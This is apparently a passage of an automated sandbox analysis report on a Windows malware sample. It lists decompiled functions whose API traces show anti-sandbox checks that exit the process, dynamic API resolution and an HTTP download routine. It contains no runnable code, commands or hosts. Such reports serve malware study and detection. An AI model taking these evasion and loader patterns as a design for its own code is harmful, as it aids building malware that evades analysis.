                            • GetProcAddress.KERNEL32(76210000,010114E8), ref: 006F650D
                            • GetProcAddress.KERNEL32(76210000,01011530), ref: 006F6526
                            • GetProcAddress.KERNEL32(76210000,01005128), ref: 006F653E
                            • GetProcAddress.KERNEL32(76210000,01011548), ref: 006F6556
                            • GetProcAddress.KERNEL32(76210000,01011560), ref: 006F656F
                            • GetProcAddress.KERNEL32(76210000,01005288), ref: 006F6587
                            • GetProcAddress.KERNEL32(76210000,01011830), ref: 006F659F
                            • GetProcAddress.KERNEL32(76210000,01005308), ref: 006F65B8
                            • LoadLibraryA.KERNEL32(01011878,?,?,?,006F1C03), ref: 006F65C9
                            • LoadLibraryA.KERNEL32(01011848,?,?,?,006F1C03), ref: 006F65DB
                            • LoadLibraryA.KERNEL32(01011890,?,?,?,006F1C03), ref: 006F65ED
                            • LoadLibraryA.KERNEL32(010117E8,?,?,?,006F1C03), ref: 006F65FE
                            • LoadLibraryA.KERNEL32(01011860,?,?,?,006F1C03), ref: 006F6610
                            • GetProcAddress.KERNEL32(75B30000,01011800), ref: 006F662D
                            • GetProcAddress.KERNEL32(751E0000,010118A8), ref: 006F6649
                            • GetProcAddress.KERNEL32(751E0000,01011818), ref: 006F6661
                            • GetProcAddress.KERNEL32(76910000,01018F20), ref: 006F667D
                            • GetProcAddress.KERNEL32(75670000,010050E8), ref: 006F6699
                            • GetProcAddress.KERNEL32(77310000,01018B08), ref: 006F66B5
                            • GetProcAddress.KERNEL32(77310000,NtQueryInformationProcess), ref: 006F66CC
                            Strings
                            • NtQueryInformationProcess, xrefs: 006F66C1
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressProc$LibraryLoad
                            • String ID: NtQueryInformationProcess
                            • API String ID: 2238633743-2781105232
                            • Opcode ID: 35916862155a8cbe592659b1beaf148655aa829dc336c69a96b10cf69119ede2
                            • Instruction ID: acd345915461fdf6334541cd6e795cf8af9ee0e03bdab251b368e89d913f06c8
                            • Opcode Fuzzy Hash: 35916862155a8cbe592659b1beaf148655aa829dc336c69a96b10cf69119ede2
                            • Instruction Fuzzy Hash: 3CA15DB5A3D601EFD754DF64EC88A263BB9F7897443008519EA96C3362DB74A840FF60
                            Function 006F1BF0 Relevance: 45.2, APIs: 30, Instructions: 220stringCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 2141 6f1bf0-6f1c0b call 6d2a90 call 6f6390 2146 6f1c0d 2141->2146 2147 6f1c1a-6f1c27 call 6d2930 2141->2147 2148 6f1c10-6f1c18 2146->2148 2151 6f1c29-6f1c2f lstrcpy 2147->2151 2152 6f1c35-6f1c63 2147->2152 2148->2147 2148->2148 2151->2152 2156 6f1c6d-6f1c7b GetSystemInfo 2152->2156 2157 6f1c65-6f1c67 ExitProcess 2152->2157 2158 6f1c7d-6f1c7f ExitProcess 2156->2158 2159 6f1c85-6f1ca0 call 6d1030 call 6d10c0 GetUserDefaultLangID 2156->2159 2164 6f1cb8-6f1cca call 6f2ad0 call 6f3e10 2159->2164 2165 6f1ca2-6f1ca9 2159->2165 2171 6f1ccc-6f1cde call 6f2a40 call 6f3e10 2164->2171 2172 6f1ce7-6f1d06 lstrlen call 6d2930 2164->2172 2165->2164 2166 6f1cb0-6f1cb2 ExitProcess 2165->2166 2171->2172 2183 6f1ce0-6f1ce1 ExitProcess 2171->2183 2178 6f1d08-6f1d0d 2172->2178 2179 6f1d23-6f1d40 lstrlen call 6d2930 2172->2179 2178->2179 2181 6f1d0f-6f1d11 2178->2181 2186 6f1d5a-6f1d7b call 6f2ad0 lstrlen call 6d2930 2179->2186 2187 6f1d42-6f1d44 2179->2187 2181->2179 2184 6f1d13-6f1d1d lstrcpy lstrcat 2181->2184 2184->2179 2193 6f1d7d-6f1d7f 2186->2193 2194 6f1d9a-6f1db4 lstrlen call 6d2930 2186->2194 2187->2186 2188 6f1d46-6f1d54 lstrcpy lstrcat 2187->2188 2188->2186 2193->2194 2195 6f1d81-6f1d85 2193->2195 2199 6f1dce-6f1deb call 6f2a40 lstrlen call 6d2930 2194->2199 2200 6f1db6-6f1db8 2194->2200 2195->2194 2197 6f1d87-6f1d94 lstrcpy lstrcat 2195->2197 2197->2194 2206 6f1ded-6f1def 2199->2206 2207 6f1e0a-6f1e0f 2199->2207 2200->2199 2201 6f1dba-6f1dc8 lstrcpy lstrcat 2200->2201 2201->2199 2206->2207 2208 6f1df1-6f1df5 2206->2208 2209 6f1e16-6f1e22 call 6d2930 2207->2209 2210 6f1e11 call 6d2a20 2207->2210 2208->2207 2211 6f1df7-6f1e04 lstrcpy lstrcat 2208->2211 2215 6f1e24-6f1e26 2209->2215 2216 6f1e30-6f1e66 call 6d2a20 * 5 OpenEventA 2209->2216 2210->2209 2211->2207 2215->2216 2217 6f1e28-6f1e2a lstrcpy 2215->2217 2228 6f1e8c-6f1ea0 CreateEventA call 6f1b20 call 6effd0 2216->2228 2229 6f1e68-6f1e8a CloseHandle Sleep OpenEventA 2216->2229 2217->2216 2233 6f1ea5-6f1eae CloseHandle ExitProcess 2228->2233 2229->2228 2229->2229
                            APIs
                              • Part of subcall function 006F6390: GetProcAddress.KERNEL32(76210000,01011668), ref: 006F63E9
                              • Part of subcall function 006F6390: GetProcAddress.KERNEL32(76210000,01011680), ref: 006F6402
                              • Part of subcall function 006F6390: GetProcAddress.KERNEL32(76210000,010116E0), ref: 006F641A
                              • Part of subcall function 006F6390: GetProcAddress.KERNEL32(76210000,01011518), ref: 006F6432
                              • Part of subcall function 006F6390: GetProcAddress.KERNEL32(76210000,01018B28), ref: 006F644B
                              • Part of subcall function 006F6390: GetProcAddress.KERNEL32(76210000,01005228), ref: 006F6463
                              • Part of subcall function 006F6390: GetProcAddress.KERNEL32(76210000,01004FC8), ref: 006F647B
                              • Part of subcall function 006F6390: GetProcAddress.KERNEL32(76210000,01011698), ref: 006F6494
                              • Part of subcall function 006F6390: GetProcAddress.KERNEL32(76210000,010116C8), ref: 006F64AC
                              • Part of subcall function 006F6390: GetProcAddress.KERNEL32(76210000,010117B8), ref: 006F64C4
                              • Part of subcall function 006F6390: GetProcAddress.KERNEL32(76210000,010117D0), ref: 006F64DD
                              • Part of subcall function 006F6390: GetProcAddress.KERNEL32(76210000,010051A8), ref: 006F64F5
                              • Part of subcall function 006F6390: GetProcAddress.KERNEL32(76210000,010114E8), ref: 006F650D
                            • lstrcpy.KERNEL32(00000000,006FCFEC), ref: 006F1C2F
                            • ExitProcess.KERNEL32 ref: 006F1C67
                            • GetSystemInfo.KERNEL32(?), ref: 006F1C71
                            • ExitProcess.KERNEL32 ref: 006F1C7F
                              • Part of subcall function 006D1030: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 006D1046
                              • Part of subcall function 006D1030: VirtualAllocExNuma.KERNEL32(00000000), ref: 006D104D
                              • Part of subcall function 006D1030: ExitProcess.KERNEL32 ref: 006D1058
                              • Part of subcall function 006D10C0: GlobalMemoryStatusEx.KERNEL32 ref: 006D10EA
                              • Part of subcall function 006D10C0: ExitProcess.KERNEL32 ref: 006D1114
                            • GetUserDefaultLangID.KERNEL32 ref: 006F1C8F
                            • ExitProcess.KERNEL32 ref: 006F1CB2
                            • ExitProcess.KERNEL32 ref: 006F1CE1
                            • lstrlen.KERNEL32(01018AE8), ref: 006F1CEE
                            • lstrcpy.KERNEL32(00000000,?), ref: 006F1D15
                            • lstrcat.KERNEL32(00000000,01018AE8), ref: 006F1D1D
                            • lstrlen.KERNEL32(00704B98), ref: 006F1D28
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006F1D48
                            • lstrcat.KERNEL32(00000000,00704B98), ref: 006F1D54
                            • lstrlen.KERNEL32(00000000), ref: 006F1D63
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006F1D89
                            • lstrcat.KERNEL32(00000000,00000000), ref: 006F1D94
                            • lstrlen.KERNEL32(00704B98), ref: 006F1D9F
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006F1DBC
                            • lstrcat.KERNEL32(00000000,00704B98), ref: 006F1DC8
                            • lstrlen.KERNEL32(00000000), ref: 006F1DD7
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006F1DF9
                            • lstrcat.KERNEL32(00000000,00000000), ref: 006F1E04
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressProc$Process$Exitlstrcpy$lstrcatlstrlen$AllocCurrentDefaultGlobalInfoLangMemoryNumaStatusSystemUserVirtual
                            • String ID:
                            • API String ID: 3366406952-0
                            • Opcode ID: 639d11582e34f3ce6fe0a12128c8078529f4cf3f8d597449f8ada3a370673e47
                            • Instruction ID: 0d32d91da89b27bab7462318d9a96fb9356c405674832845a80ec53d522f57e8
                            • Opcode Fuzzy Hash: 639d11582e34f3ce6fe0a12128c8078529f4cf3f8d597449f8ada3a370673e47
                            • Instruction Fuzzy Hash: F171E87161421AEFD760ABB1DC5DB7F3ABBAF52741F044018FA469A2A1DF349801DB60
                            Function 006D6C40 Relevance: 31.7, APIs: 16, Strings: 2, Instructions: 229networkstringfileCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 2234 6d6c40-6d6c64 call 6d2930 2237 6d6c75-6d6c97 call 6d4bc0 2234->2237 2238 6d6c66-6d6c6b 2234->2238 2242 6d6c99 2237->2242 2243 6d6caa-6d6cba call 6d2930 2237->2243 2238->2237 2239 6d6c6d-6d6c6f lstrcpy 2238->2239 2239->2237 2244 6d6ca0-6d6ca8 2242->2244 2247 6d6cbc-6d6cc2 lstrcpy 2243->2247 2248 6d6cc8-6d6cf5 InternetOpenA StrCmpCA 2243->2248 2244->2243 2244->2244 2247->2248 2249 6d6cfa-6d6cfc 2248->2249 2250 6d6cf7 2248->2250 2251 6d6ea8-6d6ebb call 6d2930 2249->2251 2252 6d6d02-6d6d22 InternetConnectA 2249->2252 2250->2249 2259 6d6ebd-6d6ebf 2251->2259 2260 6d6ec9-6d6ee0 call 6d2a20 * 2 2251->2260 2253 6d6d28-6d6d5d HttpOpenRequestA 2252->2253 2254 6d6ea1-6d6ea2 InternetCloseHandle 2252->2254 2256 6d6e94-6d6e9e InternetCloseHandle 2253->2256 2257 6d6d63-6d6d65 2253->2257 2254->2251 2256->2254 2261 6d6d7d-6d6dad HttpSendRequestA HttpQueryInfoA 2257->2261 2262 6d6d67-6d6d77 InternetSetOptionA 2257->2262 2259->2260 2263 6d6ec1-6d6ec3 lstrcpy 2259->2263 2265 6d6daf-6d6dd3 call 6f71e0 call 6d2a20 * 2 2261->2265 2266 6d6dd4-6d6de4 call 6f3d90 2261->2266 2262->2261 2263->2260 2266->2265 2275 6d6de6-6d6de8 2266->2275 2277 6d6e8d-6d6e8e InternetCloseHandle 2275->2277 2278 6d6dee-6d6e07 InternetReadFile 2275->2278 2277->2256 2278->2277 2280 6d6e0d 2278->2280 2282 6d6e10-6d6e15 2280->2282 2282->2277 2283 6d6e17-6d6e3d call 6f7310 2282->2283 2286 6d6e3f call 6d2a20 2283->2286 2287 6d6e44-6d6e51 call 6d2930 2283->2287 2286->2287 2291 6d6e61-6d6e8b call 6d2a20 InternetReadFile 2287->2291 2292 6d6e53-6d6e57 2287->2292 2291->2277 2291->2282 2292->2291 2293 6d6e59-6d6e5b lstrcpy 2292->2293 2293->2291
                            APIs
                            • lstrcpy.KERNEL32(00000000,?), ref: 006D6C6F
                            • lstrcpy.KERNEL32(00000000,006FCFEC), ref: 006D6CC2
                            • InternetOpenA.WININET(006FCFEC,00000001,00000000,00000000,00000000), ref: 006D6CD5
                            • StrCmpCA.SHLWAPI(?,0101FB50), ref: 006D6CED
                            • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 006D6D15
                            • HttpOpenRequestA.WININET(00000000,GET,?,0101F670,00000000,00000000,-00400100,00000000), ref: 006D6D50
                            • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 006D6D77
                            • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 006D6D86
                            • HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 006D6DA5
                            • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 006D6DFF
                            • lstrcpy.KERNEL32(00000000,?), ref: 006D6E5B
                            • InternetReadFile.WININET(?,00000000,000007CF,?), ref: 006D6E7D
                            • InternetCloseHandle.WININET(00000000), ref: 006D6E8E
                            • InternetCloseHandle.WININET(?), ref: 006D6E98
                            • InternetCloseHandle.WININET(00000000), ref: 006D6EA2
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006D6EC3
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Internet$lstrcpy$CloseHandleHttp$FileOpenReadRequest$ConnectInfoOptionQuerySend
                            • String ID: ERROR$GET
                            • API String ID: 3687753495-3591763792
                            • Opcode ID: 19a15119ab5a4a53812b3a8f5a5b230c09c3ee033d9509008de8dea9c0a11fa3
                            • Instruction ID: 267d92a64bd5da350a969013c86aca7ce67ccae4e95f7ae52cdae3f32d8d16a0
                            • Opcode Fuzzy Hash: 19a15119ab5a4a53812b3a8f5a5b230c09c3ee033d9509008de8dea9c0a11fa3
                            • Instruction Fuzzy Hash: CF817B71E1521AAFEB20DFA4DC49BEE77BAAF44700F044129FA45E7381DB70AD048B94
                            Function 006D4A60 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 119memoryCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 2850 6d4a60-6d4afc RtlAllocateHeap 2867 6d4afe-6d4b03 2850->2867 2868 6d4b7a-6d4bbe VirtualProtect 2850->2868 2869 6d4b06-6d4b78 2867->2869 2869->2868
                            APIs
                            • RtlAllocateHeap.NTDLL(00000000), ref: 006D4AA3
                            • VirtualProtect.KERNEL32(00000000,00000004,00000100,?), ref: 006D4BB0
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocateHeapProtectVirtual
                            • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                            • API String ID: 1542196881-3329630956
                            • Opcode ID: ac6fb27d99b9ad40f1cb00ba540f6c70bdf4894c97026025a98634a84b0c54d5
                            • Instruction ID: 99071377291c7c47926191f941b933e5d214bff9acd23a68ab6d639dac596b87
                            • Opcode Fuzzy Hash: ac6fb27d99b9ad40f1cb00ba540f6c70bdf4894c97026025a98634a84b0c54d5
                            • Instruction Fuzzy Hash: 1731E7D8FA821CB6D620FBEF4C47B5F6ED5DF85758B0142627608571C0C9A57500CAAA
                            Function 006F2A40 Relevance: 4.5, APIs: 3, Instructions: 33memoryCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 006F2A6F
                            • RtlAllocateHeap.NTDLL(00000000), ref: 006F2A76
                            • GetUserNameA.ADVAPI32(00000000,00000104), ref: 006F2A8A
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateNameProcessUser
                            • String ID:
                            • API String ID: 1296208442-0
                            • Opcode ID: 16742e6a8f0fb0b7d2b5dcd586c239ec6f569482eaecd69758bb2769a6aa567f
                            • Instruction ID: 78d39600bd9c8773f1e7a0d1ac41355b4d98fc667b933ad35f284c4cecf1d545
                            • Opcode Fuzzy Hash: 16742e6a8f0fb0b7d2b5dcd586c239ec6f569482eaecd69758bb2769a6aa567f
                            • Instruction Fuzzy Hash: 3EF0B4B2A44608AFC700DF98DD49B9FBBBCF709B21F000216FA15E3680D7B4190486E1
                            Function 006F66E0 Relevance: 210.7, APIs: 115, Strings: 5, Instructions: 696libraryloaderCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 633 6f66e0-6f66e7 634 6f6afe-6f6b92 LoadLibraryA * 8 633->634 635 6f66ed-6f6af9 GetProcAddress * 43 633->635 636 6f6c08-6f6c0f 634->636 637 6f6b94-6f6c03 GetProcAddress * 5 634->637 635->634 638 6f6c15-6f6ccd GetProcAddress * 8 636->638 639 6f6cd2-6f6cd9 636->639 637->636 638->639 640 6f6d4f-6f6d56 639->640 641 6f6cdb-6f6d4a GetProcAddress * 5 639->641 642 6f6d5c-6f6de4 GetProcAddress * 6 640->642 643 6f6de9-6f6df0 640->643 641->640 642->643 644 6f6df6-6f6f0b GetProcAddress * 12 643->644 645 6f6f10-6f6f17 643->645 644->645 646 6f6f8d-6f6f94 645->646 647 6f6f19-6f6f88 GetProcAddress * 5 645->647 648 6f6f96-6f6fbc GetProcAddress * 2 646->648 649 6f6fc1-6f6fc8 646->649 647->646 648->649 650 6f6fca-6f6ff0 GetProcAddress * 2 649->650 651 6f6ff5-6f6ffc 649->651 650->651 652 6f70ed-6f70f4 651->652 653 6f7002-6f70e8 GetProcAddress * 10 651->653 654 6f70f6-6f714d GetProcAddress * 4 652->654 655 6f7152-6f7159 652->655 653->652 654->655 656 6f716e-6f7175 655->656 657 6f715b-6f7169 GetProcAddress 655->657 658 6f7177-6f71ce GetProcAddress * 4 656->658 659 6f71d3 656->659 657->656 658->659
                            APIs
                            • GetProcAddress.KERNEL32(76210000,01005088), ref: 006F66F5
                            • GetProcAddress.KERNEL32(76210000,010052A8), ref: 006F670D
                            • GetProcAddress.KERNEL32(76210000,01019070), ref: 006F6726
                            • GetProcAddress.KERNEL32(76210000,01018FF8), ref: 006F673E
                            • GetProcAddress.KERNEL32(76210000,01019010), ref: 006F6756
                            • GetProcAddress.KERNEL32(76210000,0101DF00), ref: 006F676F
                            • GetProcAddress.KERNEL32(76210000,0100A7E8), ref: 006F6787
                            • GetProcAddress.KERNEL32(76210000,0101DF18), ref: 006F679F
                            • GetProcAddress.KERNEL32(76210000,0101DEE8), ref: 006F67B8
                            • GetProcAddress.KERNEL32(76210000,0101E080), ref: 006F67D0
                            • GetProcAddress.KERNEL32(76210000,0101DFA8), ref: 006F67E8
                            • GetProcAddress.KERNEL32(76210000,01004F68), ref: 006F6801
                            • GetProcAddress.KERNEL32(76210000,01005168), ref: 006F6819
                            • GetProcAddress.KERNEL32(76210000,010052E8), ref: 006F6831
                            • GetProcAddress.KERNEL32(76210000,01005328), ref: 006F684A
                            • GetProcAddress.KERNEL32(76210000,0101E020), ref: 006F6862
                            • GetProcAddress.KERNEL32(76210000,0101DED0), ref: 006F687A
                            • GetProcAddress.KERNEL32(76210000,0100A6A8), ref: 006F6893
                            • GetProcAddress.KERNEL32(76210000,01005268), ref: 006F68AB
                            • GetProcAddress.KERNEL32(76210000,0101E068), ref: 006F68C3
                            • GetProcAddress.KERNEL32(76210000,0101DF30), ref: 006F68DC
                            • GetProcAddress.KERNEL32(76210000,0101DF78), ref: 006F68F4
                            • GetProcAddress.KERNEL32(76210000,0101DFC0), ref: 006F690C
                            • GetProcAddress.KERNEL32(76210000,01005188), ref: 006F6925
                            • GetProcAddress.KERNEL32(76210000,0101DF48), ref: 006F693D
                            • GetProcAddress.KERNEL32(76210000,0101DF60), ref: 006F6955
                            • GetProcAddress.KERNEL32(76210000,0101DF90), ref: 006F696E
                            • GetProcAddress.KERNEL32(76210000,0101DFD8), ref: 006F6986
                            • GetProcAddress.KERNEL32(76210000,0101DFF0), ref: 006F699E
                            • GetProcAddress.KERNEL32(76210000,0101E008), ref: 006F69B7
                            • GetProcAddress.KERNEL32(76210000,0101E038), ref: 006F69CF
                            • GetProcAddress.KERNEL32(76210000,0101E050), ref: 006F69E7
                            • GetProcAddress.KERNEL32(76210000,0101D930), ref: 006F6A00
                            • GetProcAddress.KERNEL32(76210000,0100FD78), ref: 006F6A18
                            • GetProcAddress.KERNEL32(76210000,0101D9D8), ref: 006F6A30
                            • GetProcAddress.KERNEL32(76210000,0101DA20), ref: 006F6A49
                            • GetProcAddress.KERNEL32(76210000,01004F88), ref: 006F6A61
